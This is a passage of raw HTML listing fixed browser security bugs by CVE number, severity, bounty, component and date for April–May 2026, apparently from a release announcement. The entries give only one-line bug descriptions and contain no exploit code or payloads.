CVE-2026-13971 Uninitialized Use in Skia  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513779283"><span>[513779283</span></a><span>] </span><span>Medium</span><span> CVE-2026-13970 Uninitialized Use in Media  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513777411"><span>[513777411</span></a><span>] </span><span>Low</span><span> CVE-2026-14120 Inappropriate implementation in DevTools  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513772764"><span>[513772764</span></a><span>] </span><span>Low</span><span> CVE-2026-14118 Insufficient data validation in DevTools  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513762145"><span>[513762145</span></a><span>] </span><span>Medium</span><span> CVE-2026-13968 Insufficient validation of untrusted input in DevTools  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513751951"><span>[513751951</span></a><span>] </span><span>Medium</span><span> CVE-2026-13967 Type Confusion in V8  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513747800"><span>[513747800</span></a><span>] </span><span>Low</span><span> CVE-2026-14116 Insufficient validation of untrusted input in DevTools  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513745699"><span>[513745699</span></a><span>] </span><span>Low</span><span> CVE-2026-14115 Insufficient validation of untrusted input in Cast  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513741393"><span>[513741393</span></a><span>] </span><span>Medium</span><span> CVE-2026-13966 Inappropriate implementation in History  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513737952"><span>[513737952</span></a><span>] </span><span>Medium</span><span> CVE-2026-13965 Use after free in Oilpan  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513727626"><span>[513727626</span></a><span>] </span><span>Medium</span><span> CVE-2026-13963 Inappropriate implementation in DevTools  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513727494"><span>[513727494</span></a><span>] </span><span>High</span><span> CVE-2026-13830 Use after free in Chromoting  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513721370"><span>[513721370</span></a><span>] </span><span>Medium</span><span> CVE-2026-13962 Insufficient data validation in PDF  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513714023"><span>[513714023</span></a><span>] </span><span>Medium</span><span> CVE-2026-13960 Inappropriate implementation in Passwords  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513713946"><span>[513713946</span></a><span>] </span><span>Low</span><span> CVE-2026-14112 Inappropriate implementation in Enterprise  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513710926"><span>[513710926</span></a><span>] </span><span>Low</span><span> CVE-2026-14111 Use after free in WebProtect  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513698452"><span>[513698452</span></a><span>] </span><span>Low</span><span> CVE-2026-14110 Inappropriate implementation in DarkMode  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513694957"><span>[513694957</span></a><span>] </span><span>Low</span><span> CVE-2026-14109 Insufficient policy enforcement in Mojo  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513689974"><span>[513689974</span></a><span>] </span><span>Low</span><span> CVE-2026-14108 Use after free in PDFium  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513609249"><span>[513609249</span></a><span>] </span><span>Medium</span><span> CVE-2026-13959 Insufficient validation of untrusted input in Blink  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513586956"><span>[513586956</span></a><span>] </span><span>Medium</span><span> CVE-2026-14407 Inappropriate implementation in V8 on ARM64 due to AAPCS64 ABI Mismatch  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513553557"><span>[513553557</span></a><span>] </span><span>Medium</span><span> CVE-2026-13957 Incorrect security UI in Extensions  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513544566"><span>[513544566</span></a><span>] </span><span>Low</span><span> CVE-2026-14107 Use after free in Scheduling  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513528117"><span>[513528117</span></a><span>] </span><span>Low</span><span> CVE-2026-14105 Insufficient policy enforcement in Speech  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513515168"><span>[513515168</span></a><span>] </span><span>Medium</span><span> CVE-2026-13956 Incorrect security UI in PageInfo  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513504934"><span>[513504934</span></a><span>] </span><span>Medium</span><span> CVE-2026-13954 Insufficient policy enforcement in XML  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513484193"><span>[513484193</span></a><span>] </span><span>Low</span><span> CVE-2026-14104 Insufficient validation of untrusted input in WebAppInstalls  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513465245"><span>[513465245</span></a><span>] </span><span>Low</span><span> CVE-2026-14103 Use after free in SSL on ChromeOS  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513459192"><span>[513459192</span></a><span>] </span><span>Medium</span><span> CVE-2026-13953 Inappropriate implementation in SplitView  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513455047"><span>[513455047</span></a><span>] </span><span>Low</span><span> CVE-2026-14102 Use after free in Passwords  on  2026-05-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513435594"><span>[513435594</span></a><span>] </span><span>Medium</span><span> CVE-2026-14406 Out of bounds read in V8  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513401808"><span>[513401808</span></a><span>] </span><span>Medium</span><span> CVE-2026-13952 Inappropriate implementation in PerformanceAPIs  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513399832"><span>[513399832</span></a><span>] </span><span>High</span><span> CVE-2026-13828 Inappropriate implementation in Enterprise  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513394321"><span>[513394321</span></a><span>] </span><span>Medium</span><span> CVE-2026-13951 Policy bypass in USB on Linux-based Platforms  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513383891"><span>[513383891</span></a><span>] </span><span>Low</span><span> CVE-2026-14100 Insufficient data validation in NetworkCache  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513375767"><span>[513375767</span></a><span>] </span><span>Low</span><span> CVE-2026-14098 Inappropriate implementation in CSS  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513376037"><span>[513376037</span></a><span>] </span><span>Low</span><span> CVE-2026-14405 Uninitialized Use in V8  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513360781"><span>[513360781</span></a><span>] </span><span>Medium</span><span> CVE-2026-13950 Uninitialized Use in GPU  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513337989"><span>[513337989</span></a><span>] </span><span>Medium</span><span> CVE-2026-14404 Inappropriate implementation in PDFium  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513298483"><span>[513298483</span></a><span>] </span><span>Low</span><span> CVE-2026-14403 Use after free in V8  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513286820"><span>[513286820</span></a><span>] </span><span>Medium</span><span> CVE-2026-13948 Insufficient policy enforcement in Extensions  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513271007"><span>[513271007</span></a><span>] </span><span>Low</span><span> CVE-2026-14095 Insufficient validation of untrusted input in Browser  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513240099"><span>[513240099</span></a><span>] </span><span>Low</span><span> CVE-2026-14093 Use after free in Cast  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513226551"><span>[513226551</span></a><span>] </span><span>Medium</span><span> CVE-2026-13945 Insufficient policy enforcement in Extensions on Linux via XDG Global Shortcuts portal  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513222854"><span>[513222854</span></a><span>] </span><span>Critical</span><span> CVE-2026-13779 Use after free in Chromoting  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513212892"><span>[513212892</span></a><span>] </span><span>Low</span><span> CVE-2026-14092 Insufficient policy enforcement in Privacy  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513208773"><span>[513208773</span></a><span>] </span><span>Low</span><span> CVE-2026-14091 Use after free in DevTools  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513194241"><span>[513194241</span></a><span>] </span><span>Low</span><span> CVE-2026-14090 Out of bounds read in CameraCapture  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513188254"><span>[513188254</span></a><span>] </span><span>Low</span><span> CVE-2026-14089 Insufficient validation of untrusted input in PopupBlocker  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513186670"><span>[513186670</span></a><span>] </span><span>Medium</span><span> CVE-2026-13942 Insufficient validation of untrusted input in Video Capture  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513177497"><span>[513177497</span></a><span>] </span><span>High</span><span> CVE-2026-13824 Insufficient validation of untrusted input in Extensions  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513169718"><span>[513169718</span></a><span>] </span><span>Low</span><span> CVE-2026-14086 Insufficient policy enforcement in HID  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513163011"><span>[513163011</span></a><span>] </span><span>High</span><span> CVE-2026-13823 Use after free in Glic  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513158425"><span>[513158425</span></a><span>] </span><span>Medium</span><span> CVE-2026-13940 Uninitialized Use in Cast  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513155863"><span>[513155863</span></a><span>] </span><span>Low</span><span> CVE-2026-14085 Side-channel information leakage in CSS  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513143921"><span>[513143921</span></a><span>] </span><span>Medium</span><span> CVE-2026-13938 Integer overflow in Fonts  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513142445"><span>[513142445</span></a><span>] </span><span>High</span><span> CVE-2026-13821 Use after free in Canvas  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513138148"><span>[513138148</span></a><span>] </span><span>Low</span><span> CVE-2026-14084 Insufficient validation of untrusted input in Chromoting  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513128322"><span>[513128322</span></a><span>] </span><span>Low</span><span> CVE-2026-14083 Insufficient validation of untrusted input in HTML  on  2026-05-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513048822"><span>[513048822</span></a><span>] </span><span>High</span><span> CVE-2026-14401 Insufficient validation of untrusted input in ANGLE  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513049578"><span>[513049578</span></a><span>] </span><span>Low</span><span> CVE-2026-14082 Race in Storage  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513046494"><span>[513046494</span></a><span>] </span><span>Medium</span><span> CVE-2026-13937 Insufficient policy enforcement in Passwords  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513030698"><span>[513030698</span></a><span>] </span><span>Low</span><span> CVE-2026-14081 Insufficient policy enforcement in DevTools  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513012139"><span>[513012139</span></a><span>] </span><span>Critical</span><span> CVE-2026-13776 Type Confusion in Dawn  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513009005"><span>[513009005</span></a><span>] </span><span>Medium</span><span> CVE-2026-13935 Side-channel information leakage in ComputePressure  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513006636"><span>[513006636</span></a><span>] </span><span>Medium</span><span> CVE-2026-13934 Insufficient validation of untrusted input in Dawn on Android leads to GPU process UB  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513006745"><span>[513006745</span></a><span>] </span><span>Medium</span><span> CVE-2026-14399 Uninitialized Use in Dawn  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513002625"><span>[513002625</span></a><span>] </span><span>Medium</span><span> CVE-2026-13933 Insufficient policy enforcement in Passwords  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/512995785"><span>[512995785</span></a><span>] </span><span>Critical</span><span> CVE-2026-14398 Use after free in ANGLE  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/512986879"><span>[512986879</span></a><span>] </span><span>High</span><span> CVE-2026-13820 Out of bounds read in Skia  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/512971938"><span>[512971938</span></a><span>] </span><span>Low</span><span> CVE-2026-14079 Policy bypass in Network  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/512953564"><span>[512953564</span></a><span>] </span><span>Low</span><span> CVE-2026-14078 Policy bypass in WebRTC  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/512937764"><span>[512937764</span></a><span>] </span><span>Medium</span><span> CVE-2026-13930 Insufficient policy enforcement in Actor  on  2026-05-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/512162479"><span>[512162479</span></a><span>] </span><span>Medium</span><span> CVE-2026-13928 Insufficient validation of untrusted input in Enterprise  on  2026-05-11 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/511823182"><span>[511823182</span></a><span>] </span><span>High</span><span> CVE-2026-13818 Inappropriate implementation in Passwords  on  2026-05-10 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/511815165"><span>[511815165</span></a><span>] </span><span>Low</span><span> CVE-2026-14076 Policy bypass in Network  on  2026-05-10 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/511766407"><span>[511766407</span></a><span>] </span><span>Critical</span><span> CVE-2026-13775 Use after free in GPU  on  2026-05-10 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/511748106"><span>[511748106</span></a><span>] </span><span>Medium</span><span> CVE-2026-13922 Side-channel information leakage in Paint  on  2026-05-10 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/511739631"><span>[511739631</span></a><span>] </span><span>High</span><span> CVE-2026-13817 Insufficient validation of untrusted input in Glic  on  2026-05-10 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/511738175"><span>[511738175</span></a><span>] </span><span>Medium</span><span> CVE-2026-13921 Insufficient validation of untrusted input in DeviceBoundSessionCredentials  on  2026-05-10 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/511722207"><span>[511722207</span></a><span>] </span><span>High</span><span> CVE-2026-13815 Use after free in Blink  on  2026-05-10 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/511712766"><span>[511712766</span></a><span>] </span><span>High</span><span> CVE-2026-13814 Use after free in Views  on  2026-05-10 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/511290389"><span>[511290389</span></a><span>] </span><span>Low</span><span> CVE-2026-14395 Out of bounds write in V8  on  2026-05-08 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/511263221"><span>[511263221</span></a><span>] </span><span>Low</span><span> CVE-2026-14394 Use after free in V8  on  2026-05-08 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/511255112"><span>[511255112</span></a><span>] </span><span>Medium</span><span> CVE-2026-14393 Use after free in V8  on  2026-05-08 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/511249430"><span>[511249430</span></a><span>] </span><span>Medium</span><span> CVE-2026-13919 Insufficient data validation in Extensions  on  2026-05-08 </span></p><p dir="ltr"><span>[$3000.0] </span><a href="https://issuetracker.google.com/510829679"><span>[510829679</span></a><span>] </span><span>High</span><span> CVE-2026-13793 Insufficient policy enforcement in SVG  on  2026-05-07 </span></p><p dir="ltr"><span>[$1000.0] </span><a href="https://issuetracker.google.com/507263861"><span>[507263861</span></a><span>] </span><span>Low</span><span> CVE-2026-14026  Misleading Directory Upload via Split View Context Confusion   on  2026-04-28 </span></p><p dir="ltr"><span>[$0.0] </span><a href="https://issuetracker.google.com/507099867"><span>[507099867</span></a><span>] </span><span>Low</span><span> CVE-2026-14072 Incorrect security UI in SplitView Reported by [] on  2026-04-28 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/507239830"><span>[507239830</span></a><span>] </span><span>Medium</span><span> CVE-2026-13911 Insufficient data validation in Spellcheck  on  2026-04-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/507237563"><span>[507237563</span></a><span>] </span><span>Low</span><span> CVE-2026-14073 Insufficient policy enforcement in WebXR  on  2026-04-27 </span></p><p dir="ltr"><span>[$3000.0] </span><a href="https://issuetracker.google.com/507090179"><span>[507090179</span></a><span>] </span><span>Medium</span><span> CVE-2026-13858 Out of bounds read in FFmpeg  on  2026-04-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/506558270"><span>[506558270</span></a><span>] </span><span>Critical</span><span> CVE-2026-13774 Use after free in Extensions  on  2026-04-25 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/506149253"><span>[506149253</span></a><span>] </span><span>High</span><span> CVE-2026-13811 Use after free in IME  on  2026-04-24 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/506143724"><span>[506143724</span></a><span>] </span><span>Low</span><span> CVE-2026-14071 Side-channel information leakage in WebAudio  on  2026-04-24 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/505933538"><span>[505933538</span></a><span>] </span><span>Medium</span><span> CVE-2026-13909 Insufficient policy enforcement in DevTools  on  2026-04-23 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/505137978"><span>[505137978</span></a><span>] </span><span>Low</span><span> CVE-2026-14070 Uninitialized Use in WebNN  on  2026-04-21 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/505136542"><span>[505136542</span></a><span>] </span><span>Low</span><span> CVE-2026-14069 Integer overflow in WebNN  on  2026-04-21 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/504613867"><span>[504613867</span></a><span>] </span><span>Medium</span><span> CVE-2026-13906 Out of bounds read in Codecs  on  2026-04-20 </span></p><p dir="ltr"><span>[$1000.0] </span><a href="https://issuetracker.google.com/504600482"><span>[504600482</span></a><span>] </span><span>Low</span><span> CVE-2026-13810 Inappropriate implementation in Input on focus. This allows XSS to silently harvest saved passwords on page load without clicks, bypassing mandatory user gesture security checks.  on  2026-04-20 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/503912196"><span>[503912196</span></a><span>] </span><span>Medium</span><span> CVE-2026-13903 Insufficient policy enforcement in Bluetooth  on  2026-04-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/503617508"><span>[503617508</span></a><span>] </span><span>Low</span><span> CVE-2026-14065 Insufficient validation of untrusted input in PageInfo  on  2026-04-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/503585173"><span>[503585173</span></a><span>] </span><span>Medium</span><span> CVE-2026-13901 Insufficient validation of untrusted input in Serial  on  2026-04-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/503333798"><span>[503333798</span></a><span>] </span><span>High</span><span> CVE-2026-13806 Insufficient validation of untrusted input in Accessibility  on  2026-04-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/503054174"><span>[503054174</span></a><span>] </span><span>High</span><span> CVE-2026-14390 Use after free in ANGLE  on  2026-04-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/502473563"><span>[502473563</span></a><span>] </span><span>Low</span><span> CVE-2026-14063 Out of bounds memory access in Chromecast  on  2026-04-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/502448128"><span>[502448128</span></a><span>] </span><span>Low</span><span> CVE-2026-14062 Inappropriate implementation in Views on ChromeOS  on  2026-04-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/502434484"><span>[502434484</span></a><span>] </span><span>Low</span><span> CVE-2026-14061 Inappropriate implementation in Dawn on hardware with 1ns timestamp period  on  2026-04-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/502374993"><span>[502374993</span></a><span>] </span><span>Medium</span><span> CVE-2026-13900 Insufficient validation of untrusted input in Chromecast  on  2026-04-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/502363986"><span>[502363986</span></a><span>] </span><span>Low</span><span> CVE-2026-14059 Insufficient policy enforcement in Related-Website-Sets on RWS removal  on  2026-04-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/502354038"><span>[502354038</span></a><span>] </span><span>Low</span><span> CVE-2026-14058 Policy bypass in Parser  on  2026-04-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/502212647"><span>[502212647</span></a><span>] </span><span>Low</span><span> CVE-2026-14057 Insufficient policy enforcement in FedCM  on  2026-04-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/502109002"><span>[502109002</span></a><span>] </span><span>Medium</span><span> CVE-2026-13899 Use after free in HTML  on  2026-04-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501925480"><span>[501925480</span></a><span>] </span><span>Medium</span><span> CVE-2026-13898 Use after free in Cast Receiver  on  2026-04-12 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501888426"><span>[501888426</span></a><span>] </span><span>Low</span><span> CVE-2026-14056 Insufficient validation of untrusted input in Media  on  2026-04-12 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501877896"><span>[501877896</span></a><span>] </span><span>Medium</span><span> CVE-2026-13897 Insufficient policy enforcement in Chromecast  on  2026-04-12 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501873032"><span>[501873032</span></a><span>] </span><span>High</span><span> CVE-2026-13804 Use after free in Chromecast  on  2026-04-12 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501851312"><span>[501851312</span></a><span>] </span><span>Low</span><span> CVE-2026-14054 Insufficient policy enforcement in Network  on  2026-04-12 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501836539"><span>[501836539</span></a><span>] </span><span>Low</span><span> CVE-2026-14053 Insufficient policy enforcement in Extensions  on  2026-04-12 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501820076"><span>[501820076</span></a><span>] </span><span>Medium</span><span> CVE-2026-13896 Insufficient policy enforcement in Glic  on  2026-04-11 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501810874"><span>[501810874</span></a><span>] </span><span>Low</span><span> CVE-2026-14052 Insufficient policy enforcement in FileSystem  on  2026-04-11 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501770542"><span>[501770542</span></a><span>] </span><span>Medium</span><span> CVE-2026-13895 Inappropriate implementation in Autofill  on  2026-04-11 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501741117"><span>[501741117</span></a><span>] </span><span>Medium</span><span> CVE-2026-13894 Insufficient policy enforcement in Network  on  2026-04-11 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501729582"><span>[501729582</span></a><span>] </span><span>Medium</span><span> CVE-2026-13893 Insufficient validation of untrusted input in WebUI  on  2026-04-11 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501708647"><span>[501708647</span></a><span>] </span><span>Low</span><span> CVE-2026-14050 Insufficient policy enforcement in Passwords  on  2026-04-11 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501659888"><span>[501659888</span></a><span>] </span><span>Low</span><span> CVE-2026-14049 Inappropriate implementation in GPU  on  2026-04-11 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501631475"><span>[501631475</span></a><span>] </span><span>Medium</span><span> CVE-2026-13891 Insufficient validation of untrusted input in Extensions  on  2026-04-11 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/501623322"><span>[501623322</span></a><span>] </span><span>High</span><span> CVE-2026-13802 Use after free in Views  on  2026-04-11 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/500601345"><span>[500601345</span></a><span>] </span><span>Medium</span><span> CVE-2026-13890 Out of bounds read in Chromecast  on  2026-04-08 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/500587568"><span>[500587568</span></a><span>] </span><span>High</span><span> CVE-2026-13801 Integer overflow in Chromecast  on  2026-04-08 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/500566906"><span>[500566906</span></a><span>] </span><span>Medium</span><span> CVE-2026-13888 Use after free in Extensions  on  2026-04-07 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/500505046"><span>[500505046</span></a><span>] </span><span>Medium</span><span> CVE-2026-14389 Integer overflow in Skia  on  2026-04-07 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/500476886"><span>[500476886</span></a><span>] </span><span>Medium</span><span> CVE-2026-14388 Out of bounds read in ANGLE  on  2026-04-07 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/500475136"><span>[500475136</span></a><span>] </span><span>Medium</span><span> CVE-2026-13886 Policy bypass in Isolated Web Apps  on  2026-04-07 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/500305404"><span>[500305404</span></a><span>] </span><span>Medium</span><span> CVE-2026-14387 Integer overflow in Skia  on  2026-04-07 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/500077014"><span>[500077014</span></a><span>] </span><span>Medium</span><span> CVE-2026-13884 Heap buffer overflow in Chromecast  on  2026-04-06 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/500030250"><span>[500030250</span></a><span>] </span><span>Medium</span><span> CVE-2026-13883 Type Confusion in ANGLE  on  2026-04-06 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/499252371"><span>[499252371</span></a><span>] </span><span>High</span><span> CVE-2026-13799 Use after free in QUIC  on  2026-04-03 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/499189601"><span>[499189601</span></a><span>] </span><span>Low</span><span> CVE-2026-14048 Use after free in Chromecast  on  2026-04-03 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/499162550"><span>[499162550</span></a><span>] </span><span>Medium</span><span> CVE-2026-13882 Inappropriate implementation in USB  on  2026-04-02 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/499100491"><span>[499100491</span></a><span>] </span><span>Medium</span><span> CVE-2026-13881 Insufficient data validation in WebAppInstalls  on  2026-04-02 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/499048914"><span>[499048914</span></a><span>] </span><span>High</span><span> CVE-2026-13798 Heap buffer overflow in Chromecast  on  2026-04-02 </span></p><p dir="ltr"><span>[$TBD] </span><a 